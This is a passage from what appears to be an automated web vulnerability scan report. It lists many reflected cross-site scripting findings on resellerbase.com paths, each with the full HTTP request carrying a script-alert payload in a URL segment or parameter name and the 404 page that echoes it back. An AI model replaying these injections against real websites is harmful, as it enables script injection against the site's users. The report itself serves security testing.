Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=264da7<a>8f5e48ec351 was not found on this server.</p>
...[SNIP]...

2.120. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 477e0<script>alert(1)</script>2a30a9b57c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult477e0<script>alert(1)</script>2a30a9b57c6/media-chat/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult477e0<script>alert(1)</script>2a30a9b57c6/media-chat/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.121. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 75d34<script>alert(1)</script>17c5768d51d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat75d34<script>alert(1)</script>17c5768d51d/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat75d34<script>alert(1)</script>17c5768d51d/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.122. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f709a<script>alert(1)</script>77311ebc0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesf709a<script>alert(1)</script>77311ebc0d/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesf709a<script>alert(1)</script>77311ebc0d/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.123. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a84f8<script>alert(1)</script>00355eba268 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmosa84f8<script>alert(1)</script>00355eba268/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmosa84f8<script>alert(1)</script>00355eba268/images/review/ was not found on this server.</p>
...[SNIP]...

2.124. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e638d<script>alert(1)</script>896fd05865e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/imagese638d<script>alert(1)</script>896fd05865e/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/imagese638d<script>alert(1)</script>896fd05865e/review/ was not found on this server.</p>
...[SNIP]...

2.125. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2c60d<script>alert(1)</script>8d5169858d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review2c60d<script>alert(1)</script>8d5169858d9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review2c60d<script>alert(1)</script>8d5169858d9/ was not found on this server.</p>
...[SNIP]...

2.126. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc665<script>alert(1)</script>1cdcebf9fe0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/?cc665<script>alert(1)</script>1cdcebf9fe0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/?cc665<script>alert(1)</script>1cdcebf9fe0=1 was not found on this server.</p>
...[SNIP]...

2.127. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 16f69<script>alert(1)</script>cd14d45c177 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult16f69<script>alert(1)</script>cd14d45c177/media-chat/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult16f69<script>alert(1)</script>cd14d45c177/media-chat/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.128. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e118e<script>alert(1)</script>7340aa36434 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chate118e<script>alert(1)</script>7340aa36434/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chate118e<script>alert(1)</script>7340aa36434/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.129. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3c916<script>alert(1)</script>4d1362646c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes3c916<script>alert(1)</script>4d1362646c6/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes3c916<script>alert(1)</script>4d1362646c6/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.130. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8ccf2<script>alert(1)</script>6e8b33ca8fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos8ccf2<script>alert(1)</script>6e8b33ca8fb/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos8ccf2<script>alert(1)</script>6e8b33ca8fb/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.131. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 31b69<script>alert(1)</script>dea8921a1a2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images31b69<script>alert(1)</script>dea8921a1a2/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images31b69<script>alert(1)</script>dea8921a1a2/review/0.gif was not found on this server.</p>
...[SNIP]...

2.132. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9b4f6<script>alert(1)</script>8f41ec5e8ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review9b4f6<script>alert(1)</script>8f41ec5e8ab/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review9b4f6<script>alert(1)</script>8f41ec5e8ab/0.gif was not found on this server.</p>
...[SNIP]...

2.133. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c835c<script>alert(1)</script>7d0c5f7975 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/0.gifc835c<script>alert(1)</script>7d0c5f7975 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/0.gifc835c<script>alert(1)</script>7d0c5f7975 was not found on this server.</p>
...[SNIP]...

2.134. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f3b4<script>alert(1)</script>1e3a466aa67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/0.gif?9f3b4<script>alert(1)</script>1e3a466aa67=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/0.gif?9f3b4<script>alert(1)</script>1e3a466aa67=1 was not found on this server.</p>
...[SNIP]...

2.135. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e6bd<script>alert(1)</script>e770d40c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult8e6bd<script>alert(1)</script>e770d40c3b/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult8e6bd<script>alert(1)</script>e770d40c3b/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.136. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de2e<script>alert(1)</script>04a4cb43f12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat8de2e<script>alert(1)</script>04a4cb43f12/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat8de2e<script>alert(1)</script>04a4cb43f12/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.137. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f3dc<script>alert(1)</script>6e261733c4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes8f3dc<script>alert(1)</script>6e261733c4a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes8f3dc<script>alert(1)</script>6e261733c4a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.138. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5b52b<script>alert(1)</script>2a8d2374a43 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

